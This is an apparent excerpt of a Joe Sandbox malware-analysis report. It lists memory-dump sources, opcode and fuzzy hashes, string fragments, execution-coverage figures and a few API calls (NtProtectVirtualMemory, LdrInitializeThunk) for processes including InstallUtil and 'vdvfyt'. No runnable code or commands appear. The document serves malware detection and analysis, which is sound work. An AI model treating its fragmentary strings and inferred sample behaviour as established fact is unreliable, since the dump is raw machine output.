                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: )9%
                                                                                                                                  • API String ID: 0-1730265947
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: )9%
                                                                                                                                  • API String ID: 0-1730265947
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q
                                                                                                                                  • API String ID: 0-52440209
                                                                                                                                  • Opcode ID: 313efb55be524722654fa7ac27a451de14f5176ccce02cdc8ee4540d3ac8f396
                                                                                                                                  • Instruction ID: 5bd84dda2d75e5737d0e7686cf9b63259220820e6a1e751742de49740f03358a
                                                                                                                                  • Opcode Fuzzy Hash: 313efb55be524722654fa7ac27a451de14f5176ccce02cdc8ee4540d3ac8f396
                                                                                                                                  • Instruction Fuzzy Hash: 7CB1F8B4E04218CFEB54EFA9D944BEDBBF2BF89300F109069D509AB255DB709A85CF44
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q
                                                                                                                                  • API String ID: 0-52440209
                                                                                                                                  • Opcode ID: c42379a2e775a23ba8bca478bae0f00eefd4991033a97a81240cb49d993884ad
                                                                                                                                  • Instruction ID: 601b1e10608a8822f063c7f81677a9e06b8783881bb5d4ac1e0a97664c2614ad
                                                                                                                                  • Opcode Fuzzy Hash: c42379a2e775a23ba8bca478bae0f00eefd4991033a97a81240cb49d993884ad
                                                                                                                                  • Instruction Fuzzy Hash: 7EB108B4E04218CFEB54DFA9D944B9DBBF2BF89300F1080A9D549AB255DB709A85CF44
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: daq
                                                                                                                                  • API String ID: 0-1532007458
                                                                                                                                  • Opcode ID: be2feadebb1f507df6db11393bb1dcaee8554561c6e1c0e87f53a620b91f58c0
                                                                                                                                  • Instruction ID: 546f2623d2353508a6ad11a67dcfa4240b77dcac89a32050c2941572dedb43e1
                                                                                                                                  • Opcode Fuzzy Hash: be2feadebb1f507df6db11393bb1dcaee8554561c6e1c0e87f53a620b91f58c0
                                                                                                                                  • Instruction Fuzzy Hash: 5A9148B4E04208CFEB54EFA8E9447ADBBB2FF89300F109169D059A7295DB385D89CF54
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: daq
                                                                                                                                  • API String ID: 0-1532007458
                                                                                                                                  • Opcode ID: 47b47deae007403fcca626024afdad9299787d2a3ee3dbfb869e52d6107440e4
                                                                                                                                  • Instruction ID: 995953d55fd058e4124ee5c30315c04424c79c3bf403b516088cd51cc66865ca
                                                                                                                                  • Opcode Fuzzy Hash: 47b47deae007403fcca626024afdad9299787d2a3ee3dbfb869e52d6107440e4
                                                                                                                                  • Instruction Fuzzy Hash: BD9138B4E04208CFEB94EFA8E9447ADB7B2FF89300F109169D059A7295DB385D89CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270678838.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6890000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: baaba884d2dcbd946d4d8213818606ce20e292be7d09ccd8a6e883b4e1f7b268
                                                                                                                                  • Instruction ID: ebc3f5b31cf4cd44a1e8442d86c39f1a005b02a48b47cab879980dbe154da168
                                                                                                                                  • Opcode Fuzzy Hash: baaba884d2dcbd946d4d8213818606ce20e292be7d09ccd8a6e883b4e1f7b268
                                                                                                                                  • Instruction Fuzzy Hash: 79423E7094A385AFD7678B788C65B9A3FB4AF07315F19449BE180DB1E3C6784849CB32
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ef4dff81678f26413d0d88bfc9c0847e750d6ac329e68a3c4e94602d34184851
                                                                                                                                  • Instruction ID: 12f70dd6e88962db823fe2cce97f96e70bcb832cc548574175ec2937eac44176
                                                                                                                                  • Opcode Fuzzy Hash: ef4dff81678f26413d0d88bfc9c0847e750d6ac329e68a3c4e94602d34184851
                                                                                                                                  • Instruction Fuzzy Hash: 46129271E006198BDB58CFAEC98069DFBF2BF88304F64C569D419EB21AD734A946CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 35c2231410ed011d9f1d3d2bc1c43f35dd85b515cd06cc368c1797a407dce3a4
                                                                                                                                  • Instruction ID: 5bba5216e9309d3c1029854bd11a8d88824d067626ae6970699d7b8c6f4028d0
                                                                                                                                  • Opcode Fuzzy Hash: 35c2231410ed011d9f1d3d2bc1c43f35dd85b515cd06cc368c1797a407dce3a4
                                                                                                                                  • Instruction Fuzzy Hash: F8C101B0E05218CFDB14DFA9D984BADFBF2FB89304F10946AD509AB245DB345986CF60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 499b8c5e47066417c0c7af2dc4e8e0973482f6c26f4d7a8f7dda253f505911f1
                                                                                                                                  • Instruction ID: a951853357f6726e5c89c254b8bdc172fa5911c41e822aa6ba341da89b72aaa8
                                                                                                                                  • Opcode Fuzzy Hash: 499b8c5e47066417c0c7af2dc4e8e0973482f6c26f4d7a8f7dda253f505911f1
                                                                                                                                  • Instruction Fuzzy Hash: 88C1F0B0E05218CFDB14DFA9D584BADFBF2FB89304F10946AD509AB245DB345986CF60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2250151688.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2450000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3148cbbf24a405d5e9ae920ab0ba1b19683d2fff47c4c083aec1b8fbeba209a1
                                                                                                                                  • Instruction ID: 38fb1221985d3b1113aedaeba98ed41d5b2da27b583d0ba3732ae55186f62ffd
                                                                                                                                  • Opcode Fuzzy Hash: 3148cbbf24a405d5e9ae920ab0ba1b19683d2fff47c4c083aec1b8fbeba209a1
                                                                                                                                  • Instruction Fuzzy Hash: C1A1AF36E006198FCF05DFB5C84459EB7B2FF86304B16456AEC06AB222DB31E95ACF40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5417039454ee200bff3b04caed0aea46ef96d05aea7ca379952b9e401ce59180
                                                                                                                                  • Instruction ID: c335973f15933d68a52fdea7823c175c7ab37be44929881243060fc8d0c2d193
                                                                                                                                  • Opcode Fuzzy Hash: 5417039454ee200bff3b04caed0aea46ef96d05aea7ca379952b9e401ce59180
                                                                                                                                  • Instruction Fuzzy Hash: EF915C70E09208CFEB94EF68E444BAEB7F6FB4A301F109469D05AAB395DB345985CF40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a2b5b25bc70170c24cf796aaf0cf529b1ff777fafc50c9ae865e722abe322f25
                                                                                                                                  • Instruction ID: c9f181bd704c64f3297e4c2c651d0edb67e05fa1acae8064e50105591c387392
                                                                                                                                  • Opcode Fuzzy Hash: a2b5b25bc70170c24cf796aaf0cf529b1ff777fafc50c9ae865e722abe322f25
                                                                                                                                  • Instruction Fuzzy Hash: AF914AB4E04208CFEB44EFA9E544BEEB7F2EB89300F509529E01AAB395CB745941CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 643a0d7d46b2c681ab3ec0b7c0871afa7b2a27536b2cd2bcc14a502fa6e015ed
                                                                                                                                  • Instruction ID: d8af8a75c08ef37fb1f6fa60278ad1c84221d0811fe48cd87756904bf882688e
                                                                                                                                  • Opcode Fuzzy Hash: 643a0d7d46b2c681ab3ec0b7c0871afa7b2a27536b2cd2bcc14a502fa6e015ed
                                                                                                                                  • Instruction Fuzzy Hash: A89149B4E04208CFEB44EFAAD544BEEB7F6EB89300F509529E00AAB395DB745941CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 916d4d8150a5173973b53cb88d427dd72b9629539a9e9ebd4616b8c718f23406
                                                                                                                                  • Instruction ID: 4841105d95c5231dc16607280379ace3a05ccbdc57c8321e529260e8af6ce9b6
                                                                                                                                  • Opcode Fuzzy Hash: 916d4d8150a5173973b53cb88d427dd72b9629539a9e9ebd4616b8c718f23406
                                                                                                                                  • Instruction Fuzzy Hash: EA913970E08208CFEB94EF68E444BAEB7F2FB4A301F509469D05AAB395DB745985CF40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271492048.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6d70000_Ref#116670.jbxd
                                                                                                                                  • Instruction Fuzzy Hash: FF3186B1D056188BEB68CF6BCD5938EFAF6AFC5304F14C1A9C448AA264EB750985CF41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271492048.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6d70000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4d26de1b60e3145e09439604e13d2349627d9a05274a68b4025f8dcd7a000cfa
                                                                                                                                  • Instruction ID: 981dfffe69dd544422994a602cf4da738c1d746cb37ffc464ded0ca767296e19
                                                                                                                                  • Opcode Fuzzy Hash: 4d26de1b60e3145e09439604e13d2349627d9a05274a68b4025f8dcd7a000cfa
                                                                                                                                  • Instruction Fuzzy Hash: 0C21EAB1D056658BEB68CF2BC84479AFAF7AFC8300F04C4FA944CA6255EB700AD59F51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                                                                                                  • API String ID: 0-463314800
                                                                                                                                  • Opcode ID: 15bf3ae214648785e43759c2af6243ba7cfd3b9b89543e7dec92ffdfed007148
                                                                                                                                  • Instruction ID: 19072944ab8777a2b25b9a59ad518b0c683eb46d9ed9bdfdb72e33399e7c3b8b
                                                                                                                                  • Opcode Fuzzy Hash: 15bf3ae214648785e43759c2af6243ba7cfd3b9b89543e7dec92ffdfed007148
                                                                                                                                  • Instruction Fuzzy Hash: 6551C330B802099FC748EF6999507AEBBFBBFC8300F10886C91469B255DF789906C7A1

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:15%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:12.1%
                                                                                                                                  Total number of Nodes:33
                                                                                                                                  Total number of Limit Nodes:4

                                                                                                                                  Control-flow Graph

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.3286215745.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1280000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 690435f1e6e3067875618023f1489337263ba2db5b7399e413a73ebca5cd1bf1
                                                                                                                                  • Instruction ID: c4320f210f23b4e6e0c87ddf98204f9fe9cc3a7f13e06093f5e5415de4815dc6
                                                                                                                                  • Opcode Fuzzy Hash: 690435f1e6e3067875618023f1489337263ba2db5b7399e413a73ebca5cd1bf1
                                                                                                                                  • Instruction Fuzzy Hash: 45223A74E11219CFDB15EFA8C884B9DBBB2BF88300F5485A9D409AB395DB349D85CF60

                                                                                                                                  Control-flow Graph

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.3286215745.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1280000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 898e465d22e561c8ef81dc1b0058146217f64882ed9cc560140e21ee4c6ca684
                                                                                                                                  • Instruction ID: e86c137f4e482d9d169c14ede7465f93f06af2b2a724b1f88bc63692451d95da
                                                                                                                                  • Opcode Fuzzy Hash: 898e465d22e561c8ef81dc1b0058146217f64882ed9cc560140e21ee4c6ca684
                                                                                                                                  • Instruction Fuzzy Hash: 0A5168B1D222188FDB08EFAAD9446DDBBB2FF88314F14C22AD414AB395D7749846CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.3286215745.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1280000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f1f293db287c1a95b715df6811d82b7ce91e609fd45d7c3cf5540ae3f56855c0
                                                                                                                                  • Instruction ID: f6d8c4b8ac9db5ad1107b4c65da34b473e501cc6280de8807082962488a6b6de
                                                                                                                                  • Opcode Fuzzy Hash: f1f293db287c1a95b715df6811d82b7ce91e609fd45d7c3cf5540ae3f56855c0
                                                                                                                                  • Instruction Fuzzy Hash: 72513274D22218CFEB18EFA9D5846DDBBB1FF08310F249129E015BB294D7749886CF14

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • LdrInitializeThunk.NTDLL(00000000), ref: 0128C88E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.3286215745.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1280000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: 50e433e5d6f00be781b4a8e70e7ca6090ee867477299311a0bdb87a6040f7664
                                                                                                                                  • Instruction ID: 3b2d8672ffbc813f8d1552375fa1ac17dc2f11bc8356d8d7db91039e1e791b39
                                                                                                                                  • Opcode Fuzzy Hash: 50e433e5d6f00be781b4a8e70e7ca6090ee867477299311a0bdb87a6040f7664
                                                                                                                                  • Instruction Fuzzy Hash: D2117CB4E221098FDB05EBA8D484AEDBBB9FF88315F54C165E804A7282D770E851CB60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.3285681368.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_11fd000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b1dfa138377e91554407a019b5ae18ed22a98a67f2fd3b9ec276e3557ceb06f6
                                                                                                                                  • Instruction ID: 89631a5a1eb307afd9a7f0e2e845cee34136c582e56c60e9fae260f13f2dd5a8
                                                                                                                                  • Opcode Fuzzy Hash: b1dfa138377e91554407a019b5ae18ed22a98a67f2fd3b9ec276e3557ceb06f6
                                                                                                                                  • Instruction Fuzzy Hash: 1D21F271604204DFDF19DF98E980B26BBA5FB84314F24C56DDA094B296C33AD447CB62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.3285681368.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_11fd000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4599daf750c858254dd65954a385c4fdae48434fb832d5dc1801ddd9b4f7ea70
                                                                                                                                  • Instruction ID: 15fe4ea8251673dcbe52a5892eef9ead5d1efe3cc8bc180af563b4dc046b7e82
                                                                                                                                  • Opcode Fuzzy Hash: 4599daf750c858254dd65954a385c4fdae48434fb832d5dc1801ddd9b4f7ea70
                                                                                                                                  • Instruction Fuzzy Hash: C2215A755093C08FDB07CB64D994715BF71AB46214F29C5EBD9898F2A3C33A980ACB62

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:10.8%
                                                                                                                                  Dynamic/Decrypted Code Coverage:98.3%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:295
                                                                                                                                  Total number of Limit Nodes:21
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                  • API String ID: 0-3443518476
                                                                                                                                  • Opcode ID: 653b0d696e2810f0527c2e074a954bafb6d0de13e65c43689905867606e76168
                                                                                                                                  • Instruction ID: 91a4b87a5fc5626408331e9f51b29517f5d02226def9cabda9c9309cd46a0d05
                                                                                                                                  • Opcode Fuzzy Hash: 653b0d696e2810f0527c2e074a954bafb6d0de13e65c43689905867606e76168
                                                                                                                                  • Instruction Fuzzy Hash: D0B22674A00259CFDB58CFA9C894BADB7B6FF88310F158599E505AB2A5CB70EC81CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                                                                                                  • API String ID: 0-324474496
                                                                                                                                  • Opcode ID: d1ad767ebac6c9803cbc2f7401ecef66ea1a1a7962733b1eb0857e5bc99a95d6
                                                                                                                                  • Instruction ID: 5f2aa0e4b80c132cb53a494e08e763c8fa691ffad16551392c0e8baf323be104
                                                                                                                                  • Opcode Fuzzy Hash: d1ad767ebac6c9803cbc2f7401ecef66ea1a1a7962733b1eb0857e5bc99a95d6
                                                                                                                                  • Instruction Fuzzy Hash: 8E220B74A00259CFDB54DF69C984BADB7B2FF88310F1481A9E509AB2A5DB31ED81CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2513377940.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6bc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: TJbq$Te]q$paq$xb`q
                                                                                                                                  • API String ID: 0-4160082283
                                                                                                                                  • Opcode ID: 905552fc825abf475ed9b1eba3c3b33e464ad21769b3be46a7893d8ca3134500
                                                                                                                                  • Instruction ID: 1bdca5cf0c10d1af2d82e0ba3945c7764231d2fa216470b6c769ad69cd901830
                                                                                                                                  • Opcode Fuzzy Hash: 905552fc825abf475ed9b1eba3c3b33e464ad21769b3be46a7893d8ca3134500
                                                                                                                                  • Instruction Fuzzy Hash: BBA2C775E00228CFDB65CF69C984A99BBB2FF89310F1581E9D509AB325DB319E81CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Pl]q$$]q
                                                                                                                                  • API String ID: 0-2369359564
                                                                                                                                  • Opcode ID: a10545414345263a62bddb037a0f107cdc2bcde21ad3817e1f703c8221c6e9e7
                                                                                                                                  • Instruction ID: b5f9a5e48bd5768583877015f354a402f266ce446d12ea83bf888d0a548ed6a1
                                                                                                                                  • Opcode Fuzzy Hash: a10545414345263a62bddb037a0f107cdc2bcde21ad3817e1f703c8221c6e9e7
                                                                                                                                  • Instruction Fuzzy Hash: 3E325974B4020A8FCB94DF29C5A4A6A77F6FF89720B1184A9E406DF3A5DB31DC41CB61

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q$ssd
                                                                                                                                  • API String ID: 0-2907924804
                                                                                                                                  • Opcode ID: e63ec62f09068252b2d9f14bc599997d34c5d2c1089d9252a88eff6301ef2238
                                                                                                                                  • Instruction ID: 51e34d6f8fb80ebbef50ac2947ba16ddd4ae64aec420bde21e116911fb699253
                                                                                                                                  • Opcode Fuzzy Hash: e63ec62f09068252b2d9f14bc599997d34c5d2c1089d9252a88eff6301ef2238
                                                                                                                                  • Instruction Fuzzy Hash: C1022970E05229CFEB64DF68C844BA9B7B2FB4A314F1092A9D449E7346DB709E85CF50
                                                                                                                                  APIs
                                                                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0618ED61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511948888.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6180000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                  • Opcode ID: e641aa63deb803e7a970b1817ce822d4efc005548aaaaaeb332790ba6ac7e4b1
                                                                                                                                  • Instruction ID: 519269ba4ffa6f1d917597be8f19cd744466f39a118e099fc799cbee2a093f01
                                                                                                                                  • Opcode Fuzzy Hash: e641aa63deb803e7a970b1817ce822d4efc005548aaaaaeb332790ba6ac7e4b1
                                                                                                                                  • Instruction Fuzzy Hash: A021F3B1D013499FCB10DFAAD984AEEFBF5FF48310F20842AE559A7210D7759944CBA1
                                                                                                                                  APIs
                                                                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0618ED61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511948888.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6180000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                  • Opcode ID: 10895c2482b53d47fff5df14888131e3cd97031794adb96c40caf04bf75066c9
